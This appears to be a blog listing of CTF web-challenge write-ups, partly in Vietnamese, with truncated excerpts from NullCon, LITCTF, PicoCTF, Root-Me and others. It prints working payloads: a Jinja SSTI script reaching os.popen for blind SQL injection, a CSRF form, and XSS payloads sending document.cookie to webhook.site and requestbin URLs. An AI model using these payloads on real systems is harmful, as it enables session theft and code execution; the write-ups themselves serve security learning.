[Write-Up] NullCon CTF 2022 – Web

1. Jsonify 12345678910111213141516171819202122232425 classFlag{    public$isAllowedToSeeFlag;    public$flagfile;    public$properties= array(“isAllowedToSeeFlag”,”flagfile”);    publicfunction__shutdown(){        return$this->properties;    }}$obj= newFlag();$obj->isAllowedToSeeFlag = true;$obj->flagfile = “./flag.php”;//hàm này có sẵn trong source codefunctionsecure_jsonify($obj){    $data= array();    $data[‘class’] = get_class($obj);    $data[‘properties’] = array();    foreach($obj->__shutdown() as& $key){        $data[‘properties’][$key] = serialize($obj->$key);    }    returnjson_encode($data);}echosecure_jsonify($obj); 2. Unis Love Code 3. Repass 123456789101112131415161718192021222324252627 importhashlibimportrandomfromdatetime importdatetimeimporttime# timestamp = int(time.time())# print(timestamp)timestamp =1660578999dt_object =datetime.fromtimestamp(timestamp)print(“time:”, dt_object)username =”ctf”rng_init =f”{username}:{timestamp // 10}”rng =random.Random(int.from_bytes(rng_init.encode(), byteorder=’little’))p_o_w =”pow:”+”.join([b forb inchr(rng.randint(97, 122)) fori inrange(rng.randint(10, 15))])print(p_o_w)key =1forsecretContinue reading “[Write-Up] NullCon CTF 2022 – Web”

[Write-Up] LITCTF – web challenge

1. Amy The Hedgehog 2. Secure Website 3. Emoji 1234567891011121314151617181920 #!pythonimportrequestsbase=”””{{request|attr(‘application’)|attr(‘\x5f\x5fglobals\x5f\x5f’)|attr(‘\x5f\x5fgetitem\x5f\x5f’)(‘\x5f\x5fbuiltins\x5f\x5f’)|attr(‘\x5f\x5fgetitem\x5f\x5f’)(‘\x5f\x5fimport\x5f\x5f’)(‘os’)|attr(‘popen’)(“python3 -c ” + “\\”exec(‘{i}’)\\””)|attr(‘read’)()}}”””flag=””j=1whileTrue:    fori inrange(32,127):        inject=”””import requests;  r = requests.post(r\\”http://172.24.0.8:8080/runquery\\”, json={{\\”username\\”: \\”flag\\’ and substr(password,{j},1)=char({i});–\\”,\\”password\\”: \\”\\”}});print(r.text)”””.format(j=j,i=i)        c=”.join([hex(ord(inject[i])).replace(‘0x’,’\\x’) fori inrange(len(inject))])        payload={            ‘username’:’a’,            ‘password’:”{“+base.format(i=c)+”}”        }        r=requests.post(‘http://litctf.live:31781/’,data=payload,headers={“Content-Type”: “application/x-www-form-urlencoded”})        if”True”inr.text:            flag+=chr(i)            j+=1            print(flag)            break Tham khảo:

[Write-Up] – PicoCTF 2022

link: https://play.picoctf.org/events/70/challenges?category=1&page=1 1. Includes 2. Inspect HTML 3. Local Authority 4. Search source 5. Forbidden Paths 6. Power Cookie 7. Roboto Sans 8. Secrets 9. SQL Direct 10. SQLiLite 11. noted 123456789 data:text/html,<form action=”http://localhost:8080/login”method=POST id=pwn target=_blank>  <input type=”text”name=”username”value=”a”><input type=”text”name=”password”value=”a”></form><script>  window.open(‘http://localhost:8080/notes&#8217;, ‘pwn’);  setTimeout(`pwn.submit()`, 1000);  setTimeout(`window.location=’http://localhost:8080/notes?pwn&#8217;`, 1500);</script> Tham khảo:

[Write-Up] – Rootme [XSS challenge]

1. XSS – Reflected 1 <script>alert(1)</script> 1 test” onmousemove=”alert(1) 1 test’ onmousemove=’alert(1) 1 test’ onmousemove=’document.location=”https://webhook.site/65a8b027-b90a-4aab-9e17-1ef2a69d67a2?cmd=&#8221;.concat(document.cookie) 2. XSS – Stored 1 1 <imgsrc=1onerror=’document.location=”https://webhook.site/65a8b027-b90a-4aab-9e17-1ef2a69d67a2?cmd=”+document.cookie’/&gt; 3. XSS DOM Based – Introduction 1 test’; alert(1);// 1 test’; document.location=”https://webhook.site/65a8b027-b90a-4aab-9e17-1ef2a69d67a2?cmd=&#8221;.concat(document.cookie);// 1 http://challenge01.root-me.org/web-client/ch32/index.php?number=test%27;%20document.location=%22http://requestbin.net/r/crkucapp?cmd=%22.concat(document.cookie);// 4. XSS DOM based-AngularJS 1 test’; alert(1);// 1 {{constructor.constructor(“alert(1)”)()}} (đoạn mã này sử dụng hàm khởi tạo trong angularContinue reading “[Write-Up] – Rootme [XSS challenge]”

WRITE-UP ChristCTF (PTIT)

Hello các bạn 😀Nay mình xin chia sẻ một số kiến thức cơ bản của một “noober” 😥 qua mấy bài CTF khá là thú vị :v 1. Mini Con cu lay tờ (WEB) Xem đề cho gì nào Đề bài cho 1 cái máy tính và nó có thể tính mọi phép tính vàContinue reading “WRITE-UP ChristCTF (PTIT)”

Write-up UIT CTF – WannaGame

Phải nói là lâu lắm rồi mình không viết blog. Chơi xong giải này mới thấy mình quên mất một số kiến thức hay ho nên phải lưu lại ngay =))Mình xin write-up bài khá là hay trong lần thi này: xss for newbie ¯\_(ツ)_/¯ Đọc xong đề và làm bài này thì mình thấyContinue reading “Write-up UIT CTF – WannaGame”